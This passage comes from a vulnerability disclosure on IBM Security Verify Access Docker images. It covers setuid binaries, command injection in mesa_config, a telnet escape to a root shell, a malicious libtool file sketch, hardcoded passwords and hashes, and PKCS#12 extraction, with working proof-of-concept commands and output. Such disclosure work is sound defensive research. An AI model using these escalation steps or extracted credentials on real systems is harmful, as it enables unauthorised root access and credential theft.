kali-docker# cat _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/usr/lib64/openldap/syncprov.la
# syncprov.la - a libtool library file
# Generated by libtool (GNU libtool) 2.4.6
#
# Please DO NOT delete this file!
# It is necessary for linking the library.
# The name that we can dlopen(3).
dlname='syncprov-2.4.so.2'
# Names of this library.
library_names='syncprov-2.4.so.2.11.4 syncprov-2.4.so.2 syncprov.so'
[...]
# Files to dlopen/dlpreopen
dlopen=''
dlpreopen=''
# Directory that this library needs to be installed in:
libdir='/usr/lib64/openldap'
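An attacker-controlled variant of that file would only need to retarget dlname/libdir at a directory the attacker can write to. A hypothetical sketch (evil.so and /tmp/attacker are illustrative names, not paths from the advisory):

```
# syncprov.la - attacker-controlled copy (hypothetical paths)
# The name that we can dlopen(3).
dlname='evil.so'
# Names of this library.
library_names='evil.so'
# Directory that this library needs to be installed in:
libdir='/tmp/attacker'
```

When suid slapd processes a moduleload directive resolved through this file, it dlopens the attacker's shared object as root.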
Details - Local Privilege Escalation using rpm
The rpm binary has incorrect permissions in the ibmcom/verify-access instance, allowing any user to run rpm as root.
Static analysis of the extracted file system shows that the usr/bin/rpm program is owned by root:root with mode 4755:
kali-extraction-docker# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ibmcom/verify-access-runtime 10.0.4.0 498e181d7395 3 months ago 1.07GB
ibmcom/verify-access-wrp 10.0.4.0 c0003aca743c 3 months ago 442MB
ibmcom/verify-access 10.0.4.0 206efdd7809c 3 months ago 1.53GB
ibmcom/verify-access-dsc 10.0.4.0 959f6f1095e9 3 months ago 305MB
kali-extraction-docker# ls -la ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm
-rwsr-sr-x 1 root root 21336 Apr 5 14:38 ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm
While checking on a live system, we can confirm the permissions 4755 (suid bit) are used in the verify-access docker image. The file belongs to root:root:
[isam@verify-access /]$ ls -la /usr/bin/rpm
-rwsr-sr-x 1 root root 21336 Apr 6 02:38 /usr/bin/rpm
[isam@verify-access /]$ /usr/bin/rpm
RPM version 4.14.3
Copyright (C) 1998-2002 - Red Hat, Inc.
This program may be freely redistributed under the terms of the GNU GPL
Usage: rpm [-afgpcdLAlsiv?] [-a|--all] [-f|--file] [--path] [-g|--group] [-p|--package] [--pkgid] [--hdrid] [--triggeredby] [--whatconflicts] [--whatrequires] [--whatobsoletes] [--whatprovides] [--whatrecommends]
[--whatsuggests] [--whatsupplements] [--whatenhances] [--nomanifest] [-c|--configfiles] [-d|--docfiles] [-L|--licensefiles] [-A|--artifactfiles] [--dump] [-l|--list] [--queryformat=QUERYFORMAT] [-s|--state]
[--nofiledigest] [--nofiles] [--nodeps] [--noscript] [--allfiles] [--allmatches] [--badreloc] [-e|--erase=<package>+] [--excludedocs] [--excludepath=<path>] [--force] [-F|--freshen=<packagefile>+] [-h|--hash]
[--ignorearch] [--ignoreos] [--ignoresize] [--noverify] [-i|--install] [--justdb] [--nodeps] [--nofiledigest] [--nocontexts] [--nocaps] [--noorder] [--noscripts] [--notriggers] [--oldpackage] [--percent]
[--prefix=<dir>] [--relocate=<old>=<new>] [--replacefiles] [--replacepkgs] [--test] [-U|--upgrade=<packagefile>+] [--reinstall=<packagefile>+] [-D|--define='MACRO EXPR'] [--undefine=MACRO] [-E|--eval='EXPR']
[--target=CPU-VENDOR-OS] [--macros=<FILE:...>] [--noplugins] [--nodigest] [--nosignature] [--rcfile=<FILE:...>] [-r|--root=ROOT] [--dbpath=DIRECTORY] [--querytags] [--showrc] [--quiet] [-v|--verbose]
[--version] [-?|--help] [--usage] [--scripts] [--setperms] [--setugids] [--setcaps] [--restore] [--conflicts] [--obsoletes] [--provides] [--requires] [--recommends] [--suggests] [--supplements]
[--enhances] [--info] [--changelog] [--changes] [--xml] [--triggers] [--filetriggers] [--last] [--dupes] [--filesbypkg] [--fileclass] [--filecolor] [--fileprovide] [--filerequire] [--filecaps]
[isam@verify-access /]$
An attacker can run rpm as root to add or remove any package on the system, providing full root access.
Details - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes
It was observed that the official IBM Docker ibmcom/verify-access image contains several binaries with incorrect permissions (4755 - suid bit, with root:root or root:ivmgr as ownership) allowing any local user to run these programs as root:
- /opt/PolicyDirector/bin/pdmgrd
- /opt/pdweb/bin/webseald
- /usr/bin/rpm
- /usr/sbin/slapd
- /usr/sbin/mesa_config
- /usr/sbin/mesa_cli
- /usr/sbin/mesa_control
- /usr/sbin/mesa_lcd
- /usr/sbin/mesa_stats
Binaries with the suid bit:
[isam@verify-access]$ ls -la /usr/sbin/slapd
-rwsr-sr-x 1 root ivmgr 1916768 Jun 8 13:30 /usr/sbin/slapd
[isam@verify-access]$ ls -la /usr/sbin/mesa_lcd
-rwsr-xr-x 1 root root 57240 Jun 8 13:29 /usr/sbin/mesa_lcd
[isam@verify-access]$ ls -la /usr/sbin/mesa_control
-rwsr-xr-x 1 root root 98448 Jun 8 13:29 /usr/sbin/mesa_control
[isam@verify-access]$ ls -la /usr/sbin/mesa_config
-rwsr-sr-x 1 root root 2975680 Jun 8 13:29 /usr/sbin/mesa_config
[isam@verify-access]$ ls -la /usr/sbin/mesa_stats
-rwsr-xr-x 1 root root 11176 Jun 8 13:13 /usr/sbin/mesa_stats
[isam@verify-access]$ ls -la /usr/sbin/mesa_cli
-rwsr-xr-x 1 root root 436160 Jun 8 13:29 /usr/sbin/mesa_cli
[isam@verify-access]$ ls -la /usr/bin/rpm
-rwsr-sr-x 1 root root 21336 Apr 6 02:38 /usr/bin/rpm
[isam@verify-access]$ ls -la /opt/PolicyDirector/bin/pdmgrd
-r-sr-sr-x 1 root ivmgr 32040 Jun 8 13:30 /opt/PolicyDirector/bin/pdmgrd
[isam@verify-access]$ ls -la /opt/pdweb/bin/webseald
-r-sr-s--- 1 root ivmgr 29296 Jun 8 13:30 /opt/pdweb/bin/webseald
[isam@verify-access]$ ls -la /opt/dsc/bin/dscd
-r-sr-s--- 1 ivmgr ivmgr 24264 Jun 8 13:30 /opt/dsc/bin/dscd
Four trivial Local Privilege Escalations were found using the suid bit. Some additional LPEs may also exist in these programs. Trivial LPEs can be found everywhere in the mesa_* programs.
An attacker can get Local Privilege Escalations as root inside instances based on the ibmcom/verify-access image.
The code of the mesa_* programs contains several trivial vulnerabilities due to the use of the MesaSystem function (and its derivatives) found in the libwsmesa.so library. This function is an insecure wrapper around execv(), invoking /bin/sh -c with attacker-controlled values. The use of /bin/sh -c allows command injection.
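The pattern can be reproduced with a minimal shell sketch (the variable and command names below are illustrative, not IBM's actual code): anything the attacker places after a `;` in the argument is executed as a separate command.

```shell
# Illustrative re-creation of the MesaSystem pattern: an attacker-controlled
# value is interpolated into a /bin/sh -c command line without sanitization.
user_arg='harmless;echo INJECTED > /tmp/injected.txt'   # attacker input
/bin/sh -c "echo zeroizing $user_arg"                   # also runs the echo
cat /tmp/injected.txt   # prints: INJECTED
```

Quoting the argument at the call site does not help here; the injection happens inside the wrapper itself, so the robust fix is to drop the shell entirely and pass an argument vector directly to execv().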
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Details - Local Privilege Escalation using mesa_config - import of a new snapshot
The mesa_config program allows importing a new snapshot; an attacker can exploit this to obtain a Local Privilege Escalation by importing a malicious snapshot as root:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
The function MainApplySnapshot will install the new malicious snapshot as root:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Details - Local Privilege Escalation using mesa_config - command injections
Exploiting the fips_zeroize_files option in the mesa_config program provides root access.
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
The following PoC will provide root privileges inside the current instance:
[isam@verify-access /]$ id
uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
[isam@verify-access /]$ cat /tmp/test.sh
#!/bin/sh
id > /tmp/id-2
[isam@verify-access /]$ ls -la /tmp/id-2
ls: cannot access '/tmp/id-2': No such file or directory
[isam@verify-access /]$ /usr/sbin/mesa_config fips_zeroize_files "AAAAAAAAAAAAAAAAAAAAAAAA;/tmp/test.sh"
[isam@verify-access /]$ ls -la /tmp/id-2
-rw-rw-r-- 1 root root 102 Oct 13 21:32 /tmp/id-2
[isam@verify-access /]$ cat /tmp/id-2
uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
[isam@verify-access /]$
Details - Local Privilege Escalation using mesa_cli - import of a new snapshot
The mesa_cli program is also vulnerable to LPE. This tool allows any user to manage the instance:
[isam@verify-access]$ mesa_cli
Welcome to the IBM Security Verify Access appliance
Enter "help" for a list of available commands
verify-access> help
Current mode commands:
diagnostics Work with the IBM Security Verify Access diagnostics.
extensions List and remove extensions installed on the appliance.
fips View FIPS 140-2 state and events.
fixpacks Work with fix packs.
isam Work with the IBM Security Verify Access settings.
license Work with licenses.
lmi Work with the local management interface.
lmt Work with the license metric tool.
management Work with management settings.
pending_changes Work with the IBM Security Verify Access pending
changes.
snapshots Work with policy snapshot files.
support Work with support information files.
tools Work with network diagnostic tools.
Global commands:
back Return to the previous command mode.
exit Log off from the appliance.
help Display information for using the specified command.
reload Reload the container configuration.
shutdown End system operation and turn off the power.
state Display the current state of the container.
top Return to the top level.
verify-access> snapshots
verify-access:snapshots> help
Current mode commands:
apply Apply a policy snapshot file to the system.
create Create a snapshot of current policy files.
delete Delete a policy snapshot file.
get_comment View the comment associated with a policy snapshot file.
list List the policy snapshot files.
set_comment Replace the comment associated with a policy snapshot
file.
Global commands:
back Return to the previous command mode.
exit Log off from the appliance.
help Display information for using the specified command.
reload Reload the container configuration.
shutdown End system operation and turn off the power.
state Display the current state of the container.
top Return to the top level.
verify-access:snapshots> exit
[isam@verify-access /]$
The apply command inside the snapshots menu allows an attacker to install a malicious snapshot as root and obtain a Local Privilege Escalation.
Details - Local Privilege Escalation using mesa_cli - telnet escape shell
Another LPE was found using the telnet client available within mesa_cli: it is possible to escape the telnet client using the ^] escape character and get a shell as root:
[isam@verify-access /]$ id
uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
[isam@verify-access /]$ mesa_cli
Welcome to the IBM Security Verify Access appliance
Enter "help" for a list of available commands
verify-access> tools
verify-access:tools> telnet test-server01.lan 22
Trying 10.0.0.14...
Connected to test-server01.lan.
Escape character is '^]'.
SSH-2.0-OpenSSH_8.0
^]
telnet> !sh
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
sh-4.4# touch /tmp/pwned-root
sh-4.4# exit
exit
^]
telnet> q
Connection closed.
verify-access:tools> exit
[isam@verify-access /]$ ls -la /tmp/pwned-root
-rw-r--r-- 1 root root 0 Oct 13 22:21 /tmp/pwned-root
[isam@verify-access /]$
The sub_410330 function will execv() telnet through the MesaSpawn function:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Details - Outdated OpenSSL
It was observed that all the official IBM Docker images (ibmcom/verify-access-runtime, ibmcom/verify-access-wrp, ibmcom/verify-access and ibmcom/verify-access-dsc) contain the outdated OpenSSL package openssl-1.1.1k-6.el8_5.x86_64. This package contains several vulnerabilities that were patched in August 2022.
At the time of the analysis (28 October 2022), these vulnerabilities were patched by Red Hat but the official IBM Docker images were still vulnerable.
Analysis of the libssl.so.1.1.1k files found in the 4 Docker images:
kali-docker# sha256sum **/libssl.so.1.1.1k
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k
kali-docker# strings ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k|grep 1.1.1
OPENSSL_1_1_1
OPENSSL_1_1_1a
OpenSSL 1.1.1k FIPS 25 Mar 2021
libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64.debug
We can confirm that the libssl.so.1.1.1k library comes from the 1.1.1k-6.el8_5 build of OpenSSL.
The Red Hat security advisory patching vulnerabilities in this build is RHSA-2022:5818-01 (https://access.redhat.com/errata/RHSA-2022:5818).
The packages patching the vulnerabilities are:
- openssl-1.1.1k-7.el8_6.x86_64.rpm
- openssl-debuginfo-1.1.1k-7.el8_6.i686.rpm
- [...]
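Whether an installed NVR is older than the fixed one can be checked with a simple version sort (a sketch using `sort -V`; `rpmdev-vercmp` from rpmdevtools would be the more rigorous tool):

```shell
# Compare the installed openssl release against the fixed one from
# RHSA-2022:5818; if the installed NVR sorts first (and differs), it is older.
installed="1.1.1k-6.el8_5"
fixed="1.1.1k-7.el8_6"
oldest=$(printf '%s\n' "$installed" "$fixed" | sort -V | head -n1)
if [ "$oldest" = "$installed" ] && [ "$installed" != "$fixed" ]; then
    echo "vulnerable: openssl-$installed is older than openssl-$fixed"
fi
```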
With access to live systems, we can confirm that the patches have not been applied and the systems are still vulnerable:
[root@container-01]# podman ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
413823e2f7d1 ibmcom/verify-access/10.0.4.0:20220926.6 4 hours ago Up 4 hours ago (healthy) 0.0.0.0:7443->9443/tcp verify-access
a2142514d831 ibmcom/verify-access-runtime/10.0.4.0:20220926.6 4 hours ago Up 4 hours ago (healthy) 0.0.0.0:9443->9443/tcp verify-access-runtime
e0c55b6440cf ibmcom/verify-access-dsc/10.0.4.0:20220926.6 4 hours ago Up 4 hours ago (healthy) 0.0.0.0:8443-8444->8443-8444/tcp verify-access-dsc
[root@container-01]# for i in 413823e2f7d1 a2142514d831 e0c55b6440cf; do podman exec -it $i bash -c 'rpm -qa|grep -i openssl';echo;done
openssl-1.1.1k-6.el8_5.x86_64
openssl-libs-1.1.1k-6.el8_5.x86_64
apr-util-openssl-1.6.1-6.el8.x86_64
openssl-libs-1.1.1k-6.el8_5.x86_64
openssl-libs-1.1.1k-6.el8_5.x86_64
openssl-1.1.1k-6.el8_5.x86_64
The official Docker images contain known vulnerabilities.
Details - PermitRootLogin set to yes
It was observed that the configuration file /etc/sysconfig/sshd-permitrootlogin allows root login over SSH in the Docker images:
kali-docker# find . | grep sshd-permitrootlogin
./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/etc/sysconfig/sshd-permitrootlogin
./_verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin
./_verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin
./_verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin
kali-docker# cat */*/etc/sysconfig/sshd-permitrootlogin
# This file has been generated by the Anaconda Installer.
# Allow root to log in using ssh. Remove this file to opt-out.
PERMITROOTLOGIN="-oPermitRootLogin=yes"
# This file has been generated by the Anaconda Installer.
# Allow root to log in using ssh. Remove this file to opt-out.
PERMITROOTLOGIN="-oPermitRootLogin=yes"
# This file has been generated by the Anaconda Installer.
# Allow root to log in using ssh. Remove this file to opt-out.
PERMITROOTLOGIN="-oPermitRootLogin=yes"
# This file has been generated by the Anaconda Installer.
# Allow root to log in using ssh. Remove this file to opt-out.
PERMITROOTLOGIN="-oPermitRootLogin=yes"
If an SSH server were installed inside the instances, it would then be possible to log in as root.
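A hedged remediation sketch: removing the generated override file (as its own comment suggests) restores the sshd default, or the directive can be pinned explicitly.

```shell
# Remove the Anaconda-generated override; sshd then falls back to its
# compiled-in default (PermitRootLogin prohibit-password on RHEL 8).
rm -f /etc/sysconfig/sshd-permitrootlogin

# Alternatively, enforce the setting explicitly and restart sshd afterwards:
# printf 'PermitRootLogin no\n' >> /etc/ssh/sshd_config
```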
Details - Lack of password for the cluster user
It was observed that the cluster user in the Docker image verify-access does not have a password defined in the /etc/shadow file:
kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/passwd | grep cluster
cluster:x:5003:1006::/home/cluster:/usr/sbin/wga_clustersh
kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow | grep cluster
cluster::19151:0:99999:7:::
kali-docker# john --show _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow
admin:admin:19151:0:99999:7:::
cluster:NO PASSWORD:19151:0:99999:7:::
2 password hashes cracked, 0 left
In the live environment, it was confirmed that the user cluster does not have a password in the verify-access instance:
[root@test-server 5ecd09e2d7bb10f3bec5b6be4c2298d6bdb54b70a75ce67944651b6b5330821e]# cat ./merged/etc/shadow | grep cluster
cluster::19151:0:99999:7:::
If an SSH server were installed inside the instances, it would then be possible to log in as cluster without a password.
A user with local access can obtain cluster privileges.
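Accounts with an empty password field can be flagged with a one-line awk audit (demonstrated here on a sample shadow-format file; point it at /etc/shadow on a live instance):

```shell
# Build a sample shadow-format file, then flag entries whose second field
# (the password hash) is empty, i.e. accounts that require no password.
# Locked accounts ("!!") and disabled accounts ("*") are not flagged.
cat > /tmp/shadow.sample <<'EOF'
admin:$6$salt$hash:19151:0:99999:7:::
cluster::19151:0:99999:7:::
tivoli:!!:19151:0:99999:7:::
EOF
awk -F: '$2 == "" {print $1 " has no password"}' /tmp/shadow.sample
# prints: cluster has no password
```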
Details - Non-standard way of storing hashes and world-readable files containing hashes
It was observed that passwords are saved in 3 non-standard files in the Docker image verify-access:
- /etc/shadow.isam
- /etc/admin.pwd
- /etc/wga_notifications.conf
Furthermore, the /etc/shadow.isam and /etc/wga_notifications.conf files are world-readable.
When extracting verify-access, we can find the /etc/shadow.isam file:
kali-docker# cat ./698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/shadow.isam
admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::
www-data:*:14251:0:99999:7:::
ivmgr:!!:19151:0:99999:7:::
cluster::19151:0:99999:7:::
pgresql:!!:19151:0:99999:7:::
nfast:!!:19151:0:99999:7:::
tivoli:!!:19151:0:99999:7:::
When checking on the live system (verify-access), we can find these 3 previous files, 2 of which are world-readable:
[root@container-01]# podman ps | grep 413823e2f7d1
413823e2f7d1 ibmcom/verify-access/10.0.4.0:20220926.6 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:7443->9443/tcp verify-access
[root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/wga_notifications.conf /etc/shadow.isam /etc/admin.pwd
-rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd
-rw-r--r-- 1 root root 305 Jun 8 13:43 /etc/shadow.isam
-rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf
[root@container-01]#
Furthermore, we can extract passwords from these files. The hash in /etc/shadow.isam appears to be hardcoded (the password is admin):
[root@container-01]# podman exec -it 413823e2f7d1 cat /etc/shadow.isam
admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::
www-data:*:14251:0:99999:7:::
ivmgr:!!:19151:0:99999:7:::
cluster::19151:0:99999:7:::
pgresql:!!:19151:0:99999:7:::
nfast:!!:19151:0:99999:7:::
tivoli:!!:19151:0:99999:7:::
[root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/admin.pwd
-rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd
[root@container-01]# podman exec -it 413823e2f7d1 cat /etc/admin.pwd
[REDACTED]
[root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/wga_notifications.conf
-rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf
[root@container-01]# podman exec -it 413823e2f7d1 cat /etc/wga_notifications.conf
[...]
sam_cluster.hvdb.driver_type = thin
isam_cluster.hvdb.embedded = false
isam_cluster.hvdb.port = 1536
isam_cluster.hvdb.pwd = [REDACTED]
isam_cluster.hvdb.secure = false
[...]
A local attacker can extract hashes from world-readable files and elevate their privileges.
The purpose of /etc/shadow.isam is unknown.
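World-readable credential files like these can be located with a permissions-based find (shown here against a throwaway demo directory; on a live instance, run it against /etc):

```shell
# Create a demo directory with one world-readable and one group-only file,
# then list files whose "other" read bit is set.
mkdir -p /tmp/permdemo
touch /tmp/permdemo/shadow.isam /tmp/permdemo/admin.pwd
chmod 644 /tmp/permdemo/shadow.isam   # world-readable: should be flagged
chmod 660 /tmp/permdemo/admin.pwd     # group-only: should not be flagged
find /tmp/permdemo -type f -perm -o=r
# prints: /tmp/permdemo/shadow.isam
```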
Details - Hardcoded PKCS#12 files
It was observed that the Docker image verify-access contains hardcoded PKCS#12 files:
- /var/isam/cluster/sundry/odbc/ewallet.p12
- /var/pdweb/shared/keytab/lmi_trust_store.p12
- /var/pdweb/shared/keytab/embedded_ldap_keys.p12
- /var/pdweb/shared/keytab/rt_profile_keys.p12
The /var/isam/cluster/sundry/odbc/ewallet.p12 file can be found inside the verify-access image:
kali-docker# ls -la ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12
-rw-r--r-- 1 5000 5000 736 Jun 8 01:32 ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12
kali-docker# sha256sum ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12
687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5 ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12
When checking on the live system (verify-access), we can find this unchanged file:
[root@container-01]# podman ps | grep 413823e2f7d1
413823e2f7d1 ibmcom/verify-access/10.0.4.0:20220926.6 26 hours ago Up 26 hours ago (healthy) 0.0.0.0:7443->9443/tcp verify-access
[root@container-01]# podman exec -it 413823e2f7d1 ls -la /var/isam/cluster/sundry/odbc/
total 16
drwxr-xr-x 2 www-data www-data 4096 Jun 8 13:43 .
drwxr-xr-x 3 cluster cluster 4096 Jun 8 13:43 ..
-rw-r--r-- 1 www-data www-data 781 Jun 8 13:32 cwallet.sso
-rw-r--r-- 1 www-data www-data 0 Jun 8 13:32 cwallet.sso.lck
-rw-r--r-- 1 www-data www-data 736 Jun 8 13:32 ewallet.p12
-rw-r--r-- 1 www-data www-data 0 Jun 8 13:32 ewallet.p12.lck
[root@container-01]# podman exec -it 413823e2f7d1 sha256sum /var/isam/cluster/sundry/odbc/ewallet.p12
687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5 /var/isam/cluster/sundry/odbc/ewallet.p12
[root@container-01]#
This file is used by several programs and is encrypted with a trivial password (passw0rd).
Assembly code of the function authorSqlFuseFiles found inside mesa_config, used to extract ewallet.p12:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Extraction using OpenSSL:
kali-docker# openssl pkcs12 -in ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12 -out /tmp/ewallet.test
Enter Import Password: [passw0rd]
kali-docker# cat /tmp/ewallet.test
Bag Attributes
localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 04
subject=C = us, O = ibm, CN = rhel66.home.com
issuer=C = us, O = ibm, CN = rhel66.home.com
-----BEGIN CERTIFICATE-----
MIIB2TCCAUICAQAwDQYJKoZIhvcNAQEEBQAwNTELMAkGA1UEBhMCdXMxDDAKBgNV
BAoTA2libTEYMBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMB4XDTE2MDYwNDE4MjAx
N1oXDTI2MDYwMjE4MjAxN1owNTELMAkGA1UEBhMCdXMxDDAKBgNVBAoTA2libTEY
MBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQC5awQOrQ/BlLYQ1dC0+e2NplzULT447UNrj8yaPqH0FeoqgLH29FzpVJV1
IWzN06IGSUEeyAck7u7EUg1BK3eyfwO3o1qolrvRkm4Rsvg+yijUIr2aSV0Xz9oR
71C+YMHr1MtGi6Xn432+vPSc2AxQVBKCVj0rBGka6V9mwWDPewIDAQABMA0GCSqG
SIb3DQEBBAUAA4GBAF9QlpGUC9QcxgI0B77xY0/2bNd3xBfS+hTbgyyoWRzH43so
1VG97F6g0rR6wvsAOTdr7kJn+t7sMyuhdJ2/TmZFATUL+6j9XpJH+7r+Ca4iIMB+
ysi09PVz6ccrsgpD9SiYxQ4HMJ+YKBahPg3geEUIkratxB69qZy0uP5WSp64
-----END CERTIFICATE-----
kali-docker# openssl x509 -in /tmp/ewallet.test -text -noout
Certificate:
Data:
Version: 1 (0x0)
Serial Number: 0 (0x0)
Signature Algorithm: md5WithRSAEncryption
Issuer: C = us, O = ibm, CN = rhel66.home.com
Validity
Not Before: Jun 4 18:20:17 2016 GMT
Not After : Jun 2 18:20:17 2026 GMT
Subject: C = us, O = ibm, CN = rhel66.home.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (1024 bit)
Modulus:
00:b9:6b:04:0e:ad:0f:c1:94:b6:10:d5:d0:b4:f9:
ed:8d:a6:5c:d4:2d:3e:38:ed:43:6b:8f:cc:9a:3e:
a1:f4:15:ea:2a:80:b1:f6:f4:5c:e9:54:95:75:21:
6c:cd:d3:a2:06:49:41:1e:c8:07:24:ee:ee:c4:52:
0d:41:2b:77:b2:7f:03:b7:a3:5a:a8:96:bb:d1:92:
6e:11:b2:f8:3e:ca:28:d4:22:bd:9a:49:5d:17:cf:
da:11:ef:50:be:60:c1:eb:d4:cb:46:8b:a5:e7:e3:
7d:be:bc:f4:9c:d8:0c:50:54:12:82:56:3d:2b:04:
69:1a:e9:5f:66:c1:60:cf:7b
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
Signature Value:
5f:50:96:91:94:0b:d4:1c:c6:02:34:07:be:f1:63:4f:f6:6c:
d7:77:c4:17:d2:fa:14:db:83:2c:a8:59:1c:c7:e3:7b:28:d5:
51:bd:ec:5e:a0:d2:b4:7a:c2:fb:00:39:37:6b:ee:42:67:fa:
de:ec:33:2b:a1:74:9d:bf:4e:66:45:01:35:0b:fb:a8:fd:5e:
92:47:fb:ba:fe:09:ae:22:20:c0:7e:ca:c8:b4:f4:f5:73:e9:
c7:2b:b2:0a:43:f5:28:98:c5:0e:07:30:9f:98:28:16:a1:3e:
0d:e0:78:45:08:92:b6:ad:c4:1e:bd:a9:9c:b4:b8:fe:56:4a:
9e:b8
The other files have been decrypted using IBM Crypto For C and OpenSSL.
The lmi_trust_store.p12 file in the verify-access image contains several CAs and, in a live instance (after configuration), also includes the hardcoded key for the isam CA:
kali-docker# file=ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/pdweb/shared/keytab/lmi_trust_store.p12
kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw passwordpassword
kali-docker# openssl pkcs12 -in /tmp/tmp.p12 -info -passin pass:passwordpassword
MAC: sha1, Iteration 1024
MAC length: 20, salt length: 8
PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024
Certificate bag
Bag Attributes
